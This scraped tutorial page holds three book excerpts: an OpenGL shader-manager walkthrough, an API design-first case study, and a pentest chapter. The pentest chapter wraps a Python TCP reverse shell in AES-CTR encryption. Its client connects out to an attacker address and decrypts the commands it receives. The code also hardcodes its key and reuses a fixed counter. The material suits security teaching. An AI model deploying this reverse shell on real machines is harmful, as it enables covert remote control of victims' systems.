method. This method takes two arguments. The first argument is the handle to the shader program object, and the second is the handle to the shader object to be attached to the shader program. Finally, we link the program: glLinkProgram(programHandle); When we are ready to link the shaders together we call the glLinkProgram() method. This method has only one argument: the handle to the shader program we want to link. It's important that we remember to clean up any shader programs that we are not using anymore. To remove a shader program from the OpenGL memory, we call glDeleteProgram() method. The glDeleteProgram() method takes one argument: the handle to the shader program that is to be deleted. This method call invalidates the handle and frees the memory used by the shader program. It is important to note that if the shader program object is currently in use, it will not be immediately deleted, but rather flagged for deletion. This is similar to the deletion of shader objects. It is also important to note that the deletion of a shader program will detach any shader objects that were attached to the shader program at linking time. This, however, does mean the shader object will be deleted immediately unless those shader objects have already been flagged for deletion by a previous call to the glDeleteShader() method. So those are the simplified OpenGL API calls required to create, compile, and link shader programs. Now we are going to move onto implementing some structure to make the whole process much easier to work with. To do this, we are going to create a new class called ShaderManager. This class will act as the interface for compiling, linking, and managing the cleanup of shader programs. To start with, let's look at the implementation of the CompileShaders() method in the ShaderManager.cpp file. I should note that I will be focusing on the important aspects of the code that pertain to the implementation of the architecture. The full source code for this chapter can be found in the Chapter07 folder in the GitHub repository. void ShaderManager::CompileShaders(const std::string& vertexShaderFilePath, const std::string& fragmentShaderFilepath) { m_programID = glCreateProgram(); m_vertexShaderID = glCreateShader(GL_VERTEX_SHADER); if (m_vertexShaderID == 0){ Exception("Vertex shader failed to be created!"); } m_fragmentShaderID = glCreateShader(GL_FRAGMENT_SHADER); if (m_fragmentShaderID == 0){ Exception("Fragment shader failed to be created!"); } CompileShader(vertexShaderFilePath, m_vertexShaderID); CompileShader(fragmentShaderFilepath, m_fragmentShaderID); } To begin, for this example we are focusing on two of the shader types, so our ShaderManager::CompileShaders() method accepts two arguments. The first argument is the file path location of the vertex shader file, and the second is the file path location to the fragment shader file. Both are strings. Inside the method body, we first create the shader program handle using the glCreateProgram() method and store it in the m_programID variable. Next, we create the handles for the vertex and fragment shaders using the glCreateShader() command. We check for any errors when creating the shader handles, and if we find any we throw an exception with the shader name that failed. Once the handles have been created, we then call the CompileShader() method, which we will look at next. The CompileShader() function takes two arguments: the first is the path to the shader file, and the second is the handle in which the compiled shader will be stored. The following is the full CompileShader() function. It handles the look and loading of the shader file from storage, as well as calling the OpenGL compile command on the shader file. We will break it down chunk by chunk: void ShaderManager::CompileShader(const std::string& filePath, GLuint id) { std::ifstream shaderFile(filePath); if (shaderFile.fail()){ perror(filePath.c_str()); Exception("Failed to open " + filePath); } //File contents stores all the text in the file std::string fileContents = ""; //line is used to grab each line of the file std::string line; //Get all the lines in the file and add it to the contents while (std::getline(shaderFile, line)){ fileContents += line + "n"; } shaderFile.close(); //get a pointer to our file contents c string const char* contentsPtr = fileContents.c_str(); //tell opengl that we want to use fileContents as the contents of the shader file glShaderSource(id, 1, &contentsPtr, nullptr); //compile the shader glCompileShader(id); //check for errors GLint success = 0; glGetShaderiv(id, GL_COMPILE_STATUS, &success); if (success == GL_FALSE){ GLint maxLength = 0; glGetShaderiv(id, GL_INFO_LOG_LENGTH, &maxLength); //The maxLength includes the NULL character std::vector<char> errorLog(maxLength); glGetShaderInfoLog(id, maxLength, &maxLength, &errorLog[0]); //Provide the infolog in whatever manor you deem best. //Exit with failure. glDeleteShader(id); //Don't leak the shader. //Print error log and quit std::printf("%sn", &(errorLog[0])); Exception("Shader " + filePath + " failed to compile"); } } To start the function, we first use an ifstream object to open the file with the shader code in it. We also check to see if there were any issues loading the file and if, there were, we throw an exception notifying us that the file failed to open: std::ifstream shaderFile(filePath); if (shaderFile.fail()) { perror(filePath.c_str()); Exception("Failed to open " + filePath); } Next, we need to parse the shader. To do this, we create a string variable called fileContents that will hold the text in the shader file. We then create another string variable named line; this will be a temporary holder for each line of the shader file we are trying to parse. Next, we use a while loop to step through the shader file, parsing the contents line by line and saving each loop into the fileContents string. Once all the lines have been read into the holder variable, we call the close method on the shaderFile ifstream object to free up the memory used to read the file: std::string fileContents = ""; std::string line; while (std::getline(shaderFile, line)) { fileContents += line + "n"; } shaderFile.close(); You might remember from earlier in the chapter that I mentioned that when we are using the glShaderSource() function, we have to pass the shader file text as a pointer to the start of a character array. In order to meet this requirement, we are going to use a neat trick where we use the C string conversation method built into the string class to allow us to pass back a pointer to the start of our shader character array. This, in case you are unfamiliar, is essentially what a string is: const char* contentsPtr = fileContents.c_str(); Now that we have a pointer to the shader text, we can call the glShaderSource() method to tell OpenGL that we want to use the contents of the file to compile our shader. Then, finally, we call the glCompileShader() method with the handle to the shader as the argument: glShaderSource(id, 1, &contentsPtr, nullptr); glCompileShader(id); That handles the compilation, but it is a good idea to provide ourselves with some debug support. We implement this compilation debug support by closing out the CompileShader() function by first checking to see if there were any errors during the compilation process. We do this by requesting information from the shader compiler through glGetShaderiv() function, which, among its arguments, takes an enumerated value that specifies what information we would like returned. In this call, we are requesting the compile status: GLint success = 0; glGetShaderiv(id, GL_COMPILE_STATUS, &success); Next, we check to see if the returned value is GL_FALSE, and if it is, that means we have had an error and should ask the compiler for more information about the compile issues. We do this by first asking the compiler what the max length of the error log is. We use this max length value to then create a vector of character values called errorLog. Then we can request the shader compile log by using the glGetShaderInfoLog() method, passing in the handle to the shader file the number of characters we are pulling, and where we want to save the log: if (success == GL_FALSE){ GLint maxLength = 0; glGetShaderiv(id, GL_INFO_LOG_LENGTH, &maxLength); std::vector<char> errorLog(maxLength); glGetShaderInfoLog(id, maxLength, &maxLength, &errorLog[0]); Once we have the log file saved, we go ahead and delete the shader using the glDeleteShader() method. This ensures we don't have any memory leaks from our shader: glDeleteShader(id); Finally, we first print the error log to the console window. This is great for runtime debugging. We also throw an exception with the shader name/file path, and the message that it failed to compile: std::printf("%sn", &(errorLog[0])); Exception("Shader " + filePath + " failed to compile"); } ... That really simplifies the process of compiling our shaders by providing a simple interface to the underlying API calls. Now, in our example program, to load and compile our shaders we use a simple line of code similar to the following: shaderManager.CompileShaders("Shaders/SimpleShader.vert", "Shaders/SimpleShader.frag"); Having now compiled the shaders, we are halfway to a useable shader program. We still need to add one more piece, linking. To abstract away some of the processes of linking the shaders and to provide us with some debugging capabilities, we are going to create the LinkShaders() method for our ShaderManager class. Let's take a look and then break it down: void ShaderManager::LinkShaders() { //Attach our shaders to our program glAttachShader(m_programID, m_vertexShaderID); glAttachShader(m_programID, m_fragmentShaderID); //Link our program glLinkProgram(m_programID); //Note the different functions here: glGetProgram* instead of glGetShader*. GLint isLinked = 0; glGetProgramiv(m_programID, GL_LINK_STATUS, (int *)&isLinked); if (isLinked == GL_FALSE){ GLint maxLength = 0; glGetProgramiv(m_programID, GL_INFO_LOG_LENGTH, &maxLength); //The maxLength includes the NULL character std::vector<char> errorLog(maxLength); glGetProgramInfoLog(m_programID, maxLength, &maxLength, &errorLog[0]); //We don't need the program anymore. glDeleteProgram(m_programID); //Don't leak shaders either. glDeleteShader(m_vertexShaderID); glDeleteShader(m_fragmentShaderID); //print the error log and quit std::printf("%sn", &(errorLog[0])); Exception("Shaders failed to link!"); } //Always detach shaders after a successful link. glDetachShader(m_programID, m_vertexShaderID); glDetachShader(m_programID, m_fragmentShaderID); glDeleteShader(m_vertexShaderID); glDeleteShader(m_fragmentShaderID); } To start our LinkShaders() function, we call the glAttachShader() method twice, using the handle to the previously created shader program object, and the handle to each shader we wish to link, respectively: glAttachShader(m_programID, m_vertexShaderID); glAttachShader(m_programID, m_fragmentShaderID); Next, we perform the actual linking of the shaders into a usable shader program by calling the glLinkProgram() method, using the handle to the program object as its argument: glLinkProgram(m_programID); We can then check to see if the linking process has completed without any errors and provide ourselves with any debug information that we might need if there were any errors. I am not going to go through this code chunk line by line since it is nearly identical to what we did with the CompileShader() function. Do note, however, that the function to return the information from the linker is slightly different and uses glGetProgram* instead of the glGetShader* functions from before: GLint isLinked = 0; glGetProgramiv(m_programID, GL_LINK_STATUS, (int *)&isLinked); if (isLinked == GL_FALSE){ GLint maxLength = 0; glGetProgramiv(m_programID, GL_INFO_LOG_LENGTH, &maxLength); //The maxLength includes the NULL character std::vector<char> errorLog(maxLength); glGetProgramInfoLog(m_programID, maxLength, &maxLength, &errorLog[0]); //We don't need the program anymore. glDeleteProgram(m_programID); //Don't leak shaders either. glDeleteShader(m_vertexShaderID); glDeleteShader(m_fragmentShaderID); //print the error log and quit std::printf("%sn", &(errorLog[0])); Exception("Shaders failed to link!"); } Lastly, if we are successful in the linking process, we need to clean it up a bit. First, we detach the shaders from the linker using the glDetachShader() method. Next, since we have a completed shader program, we no longer need to keep the shaders in memory, so we delete each shader with a call to the glDeleteShader() method. Again, this will ensure we do not leak any memory in our shader program creation process: glDetachShader(m_programID, m_vertexShaderID); glDetachShader(m_programID, m_fragmentShaderID); glDeleteShader(m_vertexShaderID); glDeleteShader(m_fragmentShaderID); } We now have a simplified way of linking our shaders into a working shader program. We can call this interface to the underlying API calls by simply using one line of code, similar to the following one: shaderManager.LinkShaders(); So that handles the process of compiling and linking our shaders, but there is another key aspect to working with shaders, which is the passing of data to and from the running program/the game and the shader programs running on the GPU. We will look at this process and how we can abstract it into an easy-to-use interface for our engine next. Working with shader data One of the most important aspects of working with shaders is the ability to pass data to and from the shader programs running on the GPU. This can be a deep topic, and much like other topics in this book has had its own dedicated books. We are going to stay at a higher level when discussing this topic and again will focus on the two needed shader types for basic rendering: the vertex and fragment shaders. To begin with, let's take a look at how we send data to a shader using the vertex attributes and Vertex Buffer Objects (VBO). A vertex shader has the job of processing the data that is connected to the vertex, doing any modifications, and then passing it to the next stage of the rendering pipeline. This occurs once per vertex. In order for the shader to do its thing, we need to be able to pass it data. To do this, we use what are called vertex attributes, and they usually work hand in hand with what is referred to as VBO. For the vertex shader, all per-vertex input attributes are defined using the keyword in. So, for example, if we wanted to define a vector 3 input attribute named VertexColour, we could write something like the following: in vec3 VertexColour; Now, the data for the VertexColour attribute has to be supplied by the program/game. This is where VBO come in. In our main game or program, we make the connection between the input attribute and the vertex buffer object, and we also have to define how to parse or step through the data. That way, when we render, the OpenGL can pull data for the attribute from the buffer for each call of the vertex shader. Let's take a look a very simple vertex shader: #version 410 in vec3 VertexPosition; in vec3 VertexColour; out vec3 Colour; void main(){ Colour = VertexColour; gl_Position = vec4(VertexPosition, 1.0); } In this example, there are just two input variables for this vertex shader, VertexPosition and VertexColor. Our main OpenGL program needs to supply the data for these two attributes for each vertex. We will do so by mapping our polygon/mesh data to these variables. We also have one output variable named Colour, which will be sent to the next stage of the rendering pipeline, the fragment shader. In this example, Colour is just an untouched copy of VertexColour. The VertexPosition attribute is simply expanded and passed along to the OpenGL API output variable gl_Position for more processing. Next, let's take a look at a very simple fragment shader: #version 410 in vec3 Colour; out vec4 FragColour; void main(){ FragColour = vec4(Colour, 1.0); } In this fragment shader example, there is only one input attribute, Colour. This input corresponds to the output of the previous rendering stage, the vertex shader's Colour output. For simplicity's sake, we are just expanding the Colour and outputting it as the variable FragColour for the next rendering stage. That sums up the shader side of the connection, so how do we compose and send the data from inside our engine? We can accomplish this in basically four steps. First, we create a Vertex Array Object (VAO) instance to hold our data: GLunit vao; Next, we create and populate the VBO for each of the shaders' input attributes. We do this by first creating a VBO variable, then, using the glGenBuffers() method, we generate the memory for the buffer objects. We then create handles to the different attributes we need buffers for, assigning them to elements in the VBO array. Finally, we populate the buffers for each attribute by first calling the glBindBuffer() method, specifying the type of object being stored. In this case, it is a GL_ARRAY_BUFFER for both attributes. Then we call the glBufferData() method, passing the type, size, and handle to bind. The last argument for the glBufferData() method is one that gives OpenGL a hint about how the data will be used so that it can determine how best to manage the buffer internally. For full details about this argument, take a look at the OpenGL documentation: GLuint vbo[2]; glGenBuffers(2, vbo); GLuint positionBufferHandle = vbo[0]; GLuint colorBufferHandle = vbo[1]; glBindBuffer(GL_ARRAY_BUFFER,positionBufferHandle); glBufferData(GL_ARRAY_BUFFER, 9 * sizeof(float), positionData, GL_STATIC_DRAW); glBindBuffer(GL_ARRAY_BUFFER, colorBufferHandle); glBufferData(GL_ARRAY_BUFFER, 9 * sizeof(float), colorData, GL_STATIC_DRAW); The third step is to create and define the VAO. This is how we will define the relationship between the input attributes of the shader and the buffers we just created. The VAO contains this information about the connections. To create a VAO, we use the glGenVertexArrays() method. This gives us a handle to our new object, which we store in our previously created VAO variable. Then, we enable the generic vertex attribute indexes 0 and 1 by calling the glEnableVertexAttribArray() method. By making the call to enable the attributes, we are specifying that they will be accessed and used for rendering. The last step makes the connection between the buffer objects we have created and the generic vertex attribute indexes the match too: glGenVertexArrays( 1, &vao ); glBindVertexArray(vao); glEnableVertexAttribArray(0); glEnableVertexAttribArray(1); glBindBuffer(GL_ARRAY_BUFFER, positionBufferHandle); glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, NULL); glBindBuffer(GL_ARRAY_BUFFER, colorBufferHandle); glVertexAttribPointer(1, 3, GL_FLOAT, GL_FALSE, 0, NULL); Finally, in our Draw() function call, we bind to the VAO and call glDrawArrays() to perform the actual render: glBindVertexArray(vaoHandle);glDrawArrays(GL_TRIANGLES, 0, 3 ); Before we move on to another way to pass data to the shader, there is one more piece of this attribute connection structure we need to discuss. As mentioned, the input variables in a shader are linked to the generic vertex attribute we just saw, at the time of linking. When we need to specify the relationship structure, we have a few different choices. We can use what are known as layout qualifiers within the shader code itself. The following is an example: layout (location=0) in vec3 VertexPosition; Another choice is to just let the linker create the mapping when linking, and then query for them afterward. The third and the one I personally prefer is to specify the relationship prior to the linking process by making a call to the glBindAttribLocation() method. We will see how this is implemented shortly when we discuss how to abstract these processes. We have described how we can pass data to a shader using attributes, but there is another option: uniform variables. Uniform variables are specifically used for data that changes infrequently. For example, matrices are great candidates for uniform variables. Within a shader, a uniform variable is read-only. That means the value can only be changed from outside the shader. They can also appear in multiple shaders within the same shader program. They can be declared in one or more shaders within a program, but if a variable with a given name is declared in more than one shader, its type must be the same in all shaders. This gives us insight into the fact that the uniform variables are actually held in a shared namespace for the whole of the shader program. To use a uniform variable in your shader, you first have to declare it in the shader file using the uniform identifier keyword. The following is what this might look like: uniform mat4 ViewMatrix; We then need to provide the data for the uniform variable from inside our game/program. We do this by first finding the location of the variable using the glGetUniformLocation() method. Then we assign a value to the found location using one of the glUniform() methods. The code for this process could look something like the following: GLuint location = glGetUniformLocation(programHandle," ViewMatrix "); if( location >= 0 ) { glUniformMatrix4fv(location, 1, GL_FALSE, &viewMatrix [0][0]) } We then assign a value to the uniform variable's location using the glUniformMatrix4fv() method. The first argument is the uniform variable's location. The second argument is the number of matrices that are being assigned. The third is a GL bool type specifying whether or not the matrix should be transposed. Since we are using the GLM library for our matrices, a transpose is not required. If you were implementing the matrix using data that was in row-major order, instead of column-major order, you might need to use the GL_TRUE type for this argument. The last argument is a pointer to the data for the uniform variable. Uniform variables can be any GLSL type, and this includes complex types such as structures and arrays. The OpenGL API provides a glUniform() function with the different suffixes that match each type. For example, to assign to a variable of type vec3, we would use glUniform3f() or glUniform3fv() methods. (the v denotes multiple values in the array). So, those are the concepts and techniques for passing data to and from our shader programs. However, as we did for the compiling and linking of our shaders, we can abstract these processes into functions housed in our ShaderManager class. We are going to focus on working with attributes and uniform variables. First, we will look at the abstraction of adding attribute bindings using the AddAttribute() function of the ShaderManger class. This function takes one argument, the attribute's name, to be bound as a string. We then call the glBindAttribLocation() function, passing the program's handle and the current index or number of attributes, which we increase on call, and finally the C string conversion of the attributeName string, which provides a pointer to the first character in the string array. This function must be called after compilation, but before the linking of the shader program: void ShaderManager::AddAttribute(const std::string& attributeName) { glBindAttribLocation(m_programID, m_numAttributes++, attributeName.c_str()); } For the uniform variables, we create a function that abstracts looking up the location of the uniform in the shader program, the GetUniformLocation() function. This function again takes only one variable which is a uniform name in the form of a string. We then create a temporary holder for the location and assign it the returned value of the glGetUniformLocation() method call. We check to make sure the location is valid, and if not we throw an exception letting us know about the error. Finally, we return the valid location if found: GLint ShaderManager::GetUniformLocation(const std::string& uniformName) { GLint location = glGetUniformLocation(m_programID, uniformName.c_str()); if (location == GL_INVALID_INDEX) { Exception("Uniform " + uniformName + " not found in shader!"); } return location; } This gives us the abstraction for binding our data, but we still need to assign which shader should be used for a certain draw call, and to activate any attributes we need. To accomplish this, we create a function in the ShaderManager called Use(). This function will first set the current shader program as the active one using the glUseProgram() API method call. We then use a for loop to step through the list of attributes for the shader program, activating each one: void ShaderManager::Use(){ glUseProgram(m_programID); for (int i = 0; i < m_numAttributes; i++) { glEnableVertexAttribArray(i); } } Of course, since we have an abstracted way to enable the shader program, it only makes sense that we should have a function to disable the shader program. This function is very similar to the Use() function, but in this case, we are setting the program in use to 0, effectively making it NULL, and we use the glDisableVertexAtrribArray() method to disable the attributes in the for loop: void ShaderManager::UnUse() { glUseProgram(0); for (int i = 0; i < m_numAttributes; i++) { glDisableVertexAttribArray(i); } } The net effect of this abstraction is we can now set up our entire shader program structure with a few simple calls. Code similar to the following would create and compile the shaders, add the necessary attributes, link the shaders into a program, locate a uniform variable, and create the VAO and VBO for a mesh: shaderManager.CompileShaders("Shaders/SimpleShader.vert", "Shaders/SimpleShader.frag"); shaderManager.AddAttribute("vertexPosition_modelspace"); shaderManager.AddAttribute("vertexColor"); shaderManager.LinkShaders(); MatrixID = shaderManager.GetUniformLocation("ModelViewProjection"); m_model.Init("Meshes/Dwarf_2_Low.obj", "Textures/dwarf_2_1K_color.png"); Then, in our Draw loop, if we want to use this shader program to draw, we can simply use the abstracted functions to activate and deactivate our shader, similar to the following code: shaderManager.Use(); m_model.Draw(); shaderManager.UnUse(); This makes it much easier for us to work with and test out advanced rendering techniques using shaders. Here in this article, we have discussed how advanced rendering techniques, hands-on practical knowledge of game physics and shaders and lighting can help you to create advanced games with C++. If you have liked this above article, check out the complete book Mastering C++ game Development.  How to use arrays, lists, and dictionaries in Unity for 3D game development Unity 2D & 3D game kits simplify Unity game development for beginners How AI is changing game development
Read more
  • 0
  • 0
  • 47216

article-image-implementing-an-api-design-first-approach-for-building-apis
Packt Editorial Staff
15 Jun 2018
9 min read
Save for later

Implement an API Design-first approach for building APIs [Tutorial]

Packt Editorial Staff
15 Jun 2018
9 min read
The Monster Records & Associates (MRA) –a fictional music records company, having realised that its biggest asset is in fact its data, embarked on a digital transformation with the aim to offer its product and offerings completely online and via APIs. This article is an excerpt taken from the book Implementing Oracle API Platform Cloud Service, written  by Andy Bell, Sander Rensen, Luis Weir, Phil Wilkins. In this post we are is going to take  you through an interesting MRA case study who adopted an API design-first approach for building its APIs. We will go through the process and steps performed by MRA for this implementation. The Problem Scenario MRA had embarked on a digital transformation journey with the objective to become a digital organisation capable of offering tailored (à la carte) offerings to artists such as handling of an artist’s online presence to on-demand distribution of an artist's digital media to Music Streaming Services such as Spotify, Apple Music, Google Play Music, Amazon Prime Music, Pandora, Deezer to name a few. Having fully acknowledged that their most valuable asset is in fact their media data, MRA wanted to materialise in such assets and determined that the quickest and most effective way to achieve this was by exposing a public API capable of providing access, on-demand, to MRA's Media Catalogue assets such as artists, songs and albums. Figure 1: MRA's Media Catalogue API The idea being, once such assets became accessible via an API, streaming services could, on-demand and 24x7, explore MRA's repertoire, purchase rights-to-use and start streaming. In addition, the API could also open the door to a brand new global audience: millions of app developers constantly innovating. If only a fraction of such a huge audience leveraged MRA's Media Catalogue API, it would still represent a considerable success for MRA. However, as with everything, there is a challenge to realise such vision. MRA like many other organizations, had a level of experience with systems integrations and Service Oriented Architectures (SOA). One of the lessons learnt from SOA however was that the cycles for designing, building, prototyping, and testing SOAP-based Web Services could be quite lengthy and expensive. An API differentiates from a service in that the former represents the RESTful interface a consumer application interacts with, whereas the latter is the actual implementation (the code) behind an API. A HTTP endpoint exposed by a service is defined as an unmanaged API. When a service endpoint is accessed via an API Gateway where policies such as app-key validation, authentication/authorization and other policies are enforced, then it becomes a managed API. The book, Implementing Oracle API Platform Cloud Service, refers to managed APIs as simply APIs and unmanaged APIs as simply service endpoints. Especially when it came to capturing and accommodating the feedback from Client Application Developers (API consumers), MRA had very bad experiences as in the majority of occasions they came to realize very late in the software lifecycle that the Web Service developed did not meet the expectations of its consumers. Figure 2: feedback-loops in traditional web service design Refactoring web services in this approach wasn't just time consuming but also an expensive exercise as both the Service design (WSDL) and code had to be refactored and re-tested in order to accommodate the feedback received and before application developers could try a service again. Naturally service designers and developers avoided as much as possible making changes, thus challenging feedback received from application developers, which in turn created friction amongst both teams but in some occasions meant application developers finding alternative routes to solve their needs rather than using the web service. This was the worst possible scenario as it meant that the investments made in implementing a web service could've been wasted. API design-first process Learning from experiences and acknowledging the challenges that such waterfall like process imposed to a digital transformation initiative, MRA were quite keen to adopt a more agile, interactive but also quicker way to deliver modern RESTful based APIs. The idea was clear. By engaging application developers (API consumers) in the initial stages of the design process, feedback would be captured and reflected back in the interface design (API) early as well. Not only this would shorten feedback loops, but ensure that once the underlying services are implemented, it would expose an interface already endorsed and tested by its consumers, as opposed to risk building a service that won't satisfy the client expectations and needs late in the process. Figure 3: API design-first approach vs traditional service design The implication of this approach though, is that the tooling and notation to define the API, had to be both simple, yet rich in capability such as the task of designing and mocking API endpoints is quick and easy, given that if the process becomes cumbersome it would defeat its purpose. We elaborate on the different steps undertaken by MRA when designing its Media Catalogue API using Apiary and related tools in the book, Implementing Oracle API Platform Cloud Service. Here are the steps: Defining the API type Defining the API’s domain semantics Creating the API definition with its main resources Trying the API mock Defining MSON Data Structures Pushing the API Blueprint to GitHub Publishing the API mock in Oracle API Platform CS Setting up Dredd for continuous testing of API endpoints against the API blueprint Defining the API type: A fundamental step when designing any API is to first define what the type is. This is important as it will determine the guiding principles to consider when doing the design. We have three types of APIs: Single-Purpose APIs: These are APIs that serve a unique and specific purpose, typically derived from an unambiguous need associated with a user journey or use case. Multi-Purpose APIs: These APIs are more generic in nature and are meant to satisfy not just one but multiple use cases and scenarios. They are not bound (coupled) to a specific user journey or system of engagement (for example, a mobile app) therefore ideal for reuse enterprise-wide. MRA’s Media Catalogue API: MRA's Media Catalogue API was specifically targeted at two main audiences: Music Streaming Services and Application Developers in general. Therefore, the API had to be both Public and Multi-Purpose. Defining the API’s domain semantics: This step elaborates proper understanding of the API's bounded context, Media Catalogue. To do so, entities, key attributes, and relationships within the bounded context itself were identified and also defined using semantics appropriate for the purpose of the API. Creating the API definition with its main resources: This step shows how to create an API and define its main resources, parameters, and sample payloads.It involves steps followed by MRA when creating the Media Catalogue API definition and its associated API mock. Trying the API mock: This part describes how Apiary's automatically generated API mocks can be used to satisfy one of the most important steps in API design-first: try an API early in the lifecycle, before the API is actually implemented. This is a critical step as collecting feedback from API consumers early can potentially save numerous hours in code refactoring later in the project. Defining MSON Data Structures: The Markdown Syntax for Object Notation (MSON) is a plain-text syntax for the description and validation of Data Structures in API Blueprint. It provides a way to represent objects (for example, an artist) in a human-readable plain text form. This part involves steps to define the Artist, Album and Song objects using the MSON notation. Pushing the API Blueprint to GitHub: API Blueprints can be pushed into GitHub repositories, so they can be version controlled but most importantly it can follow a similar GitHub cycle as any other code asset. This step is also required in order to configure Dredd to validate API endpoints against API blueprint definitions. Publishing the API mock in Oracle API Platform CS: Although Apiary provides an API mock URL that can be can be accessed directly, it is recommended that instead, the API mock is published and accessed via the Oracle API Platform Cloud Service. Setting up Dredd for continuous testing of API endpoints against the API blueprint: The last step of the API design-first process is to configure Dredd to continuously validate that an API endpoint exposed through the API Gateway is always compliant with its corresponding API Blueprint definition. The idea is to ensure that Client Application code is not broken once an API Policy is changed to point to a Backend Service once it has been built and deployed. We discussed the API design-first approach for building its APIs. MRA's business scenario demanded the need for more efficient and leaner process for implementing APIs. We saw how an API design-first process could effectively help organizations such as MRA gain greater speed, agility, and efficiencies. Here’s a summary of the basic steps to realize such process. Choose your API type: We introduced the conceptual concepts such as Single Purpose and Multi-Purpose APIs to decide on what type of API to adopt. Define your APIs: The need for creating an API definition and an API mock in Apiary based on API Blueprints and the Markdown Syntax for Object Notation (MSON). Create & publish API: Creation and publication of an API using the Oracle API Platform Cloud Service. Continuously test: Finally, the configuration of Dredd to verify API endpoints compliance with the API definition. You just enjoyed an excerpt from the book Implementing Oracle API Platform Cloud Services. Grab the latest edition of this book to work with the newest Oracle APIs, and interface with an increasingly complex array of services your clients want. What are the best programming languages for building APIs? Glancing at the Fintech growth story – Powered by ML, AI & APIs What RESTful APIs can do for Cloud, IoT, social media and other emerging technologies  
Read more
  • 0
  • 0
  • 40577
article-image-protect-tcp-tunnel-implementing-aes-encryption-with-python
Savia Lobo
15 Jun 2018
7 min read
Save for later

Protect your TCP tunnel by implementing AES encryption with Python [Tutorial]

Savia Lobo
15 Jun 2018
7 min read
TCP (Transfer Communication Protocol) is used to streamline important communications. TCP works with the Internet Protocol (IP), which defines how computers send packets of data to each other. Thus, it becomes highly important to secure this data to avoid MITM (man in the middle attacks). In this article, you will learn how to protect your TCP tunnel using the Advanced Encryption Standard (AES) encryption to protect its traffic in the transit path. This article is an excerpt taken from 'Python For Offensive PenTest'written by Hussam Khrais.  Protecting your tunnel with AES In this section, we will protect our TCP tunnel with AES encryption. Now, generally speaking, AES encryption can operate in two modes, the Counter (CTR) mode encryption (also called the Stream Mode) and the Cipher Block Chaining (CBC) mode encryption (also called the Block Mode). Cipher Block Chaining (CBC) mode encryption The Block Mode means that we need to send data in the form of chunks: For instance, if we say that we have a block size of 512 bytes and we want to send 500 bytes, then we need to add 12 bytes additional padding to reach 512 bytes of total size. If we want to send 514 bytes, then the first 512 bytes will be sent in a chunk and the second chunk or the next chunk will have a size of 2 bytes. However, we cannot just send 2 bytes alone, as we need to add additional padding of 510 bytes to reach 512 in total for the second chunk. Now, on the receiver side, you would need to reverse the steps by removing the padding and decrypting the message. Counter (CTR) mode encryption Now, let's jump to the other mode, which is the Counter (CTR) mode encryption or the Stream Mode: Here, in this mode, the message size does not matter since we are not limited with a block size and we will encrypt in stream mode, just like XOR does. Now, the block mode is considered stronger by design than the stream mode. In this section, we will implement the stream mode and I will leave it to you to search around and do the block mode. The most well-known library for cryptography in Python is called PyCrypto. For Windows, there is a compiled binary for it, and for the Kali side, you just need to run the setup file after downloading the library. You can download the library from http://www.voidspace.org.uk/python/modules.shtml#pycrypto. So, as a start, we will use AES without TCP or HTTP tunneling: # Python For Offensive PenTest # Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # http://www.voidspace.org.uk/python/modules.shtml#pycrypto # Download Pycrypto source # https://pypi.python.org/pypi/pycrypto # For Kali, after extract the tar file, invoke "python setup.py install" # AES Stream import os from Crypto.Cipher import AES counter = os.urandom(16) #CTR counter string value with length of 16 bytes. key = os.urandom(32) #AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long. # Instantiate a crypto object called enc enc = AES.new(key, AES.MODE_CTR, counter=lambda: counter) encrypted = enc.encrypt("Hussam"*5) print encrypted # And a crypto object for decryption dec = AES.new(key, AES.MODE_CTR, counter=lambda: counter) decrypted = dec.decrypt(encrypted) print decrypted The code is quite straightforward. We will start by importing the os library, and we will import the AES class from Crypto.Cipher library. Now, we use the os library to create the random key and random counter. The counter length is 16 bytes, and we will go for 32 bytes length for the key size in order to implement AES-256. Next, we create an encryption object by passing the key, the AES mode (which is again the stream or CTR mode) and the counter value. Now, note that the counter is required to be sent as a callable object. That's why we used lambda structure or lambda construct, where it's a sort of anonymous function, like a function that is not bound to a name. The decryption is quite similar to the encryption process. So, we create a decryption object, and then pass the encrypted message and finally, it prints out the decrypted message, which should again be clear text. So, let's quickly test this script and encrypt my name. Once we run the script the encrypted version will be printed above and the one below is the decrypted one, which is the clear-text one: >>> ]ox:|s Hussam >>> So, to test the message size, I will just invoke a space and multiply the size of my name with 5. So, we have 5 times of the length here. The size of the clear-text message does not matter here. No matter what the clear-text message was, with the stream mode, we get no problem at all. Now, let us integrate our encryption function to our TCP reverse shell. The following is the client side script: # Python For Offensive PenTest# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # http://www.voidspace.org.uk/python/modules.shtml#pycrypto # Download Pycrypto source # https://pypi.python.org/pypi/pycrypto # For Kali, after extract the tar file, invoke "python setup.py install" # AES - Client - TCP Reverse Shell import socket import subprocess from Crypto.Cipher import AES counter = "H"*16 key = "H"*32 def encrypt(message): encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter) return encrypto.encrypt(message) def decrypt(message): decrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter) return decrypto.decrypt(message) def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('10.10.10.100', 8080)) while True: command = decrypt(s.recv(1024)) print ' We received: ' + command ... What I have added was a new function for encryption and decryption for both sides and, as you can see, the key and the counter values are hardcoded on both sides. A side note I need to mention is that we will see in the hybrid encryption later how we can generate a random value from the Kali machine and transfer it securely to our target, but for now, let's keep it hardcoded here. The following is the server side script: # Python For Offensive PenTest # Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # http://www.voidspace.org.uk/python/modules.shtml#pycrypto # Download Pycrypto source # https://pypi.python.org/pypi/pycrypto # For Kali, after extract the tar file, invoke "python setup.py install" # AES - Server- TCP Reverse Shell import socket from Crypto.Cipher import AES counter = "H"*16 key = "H"*32 def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("10.10.10.100", 8080)) s.listen(1) print '[+] Listening for incoming TCP connection on port 8080' conn, addr = s.accept() print '[+] We got a connection from: ', addr ... This is how it works. Before sending anything, we will pass whatever we want to send to the encryption function first. When we get the shell prompt, our input will be passed first to the encryption function; then it will be sent out of the TCP socket. Now, if we jump to the target side, it's almost a mirrored image. When we get an encrypted message, we will pass it first to the decryption function, and the decryption will return the 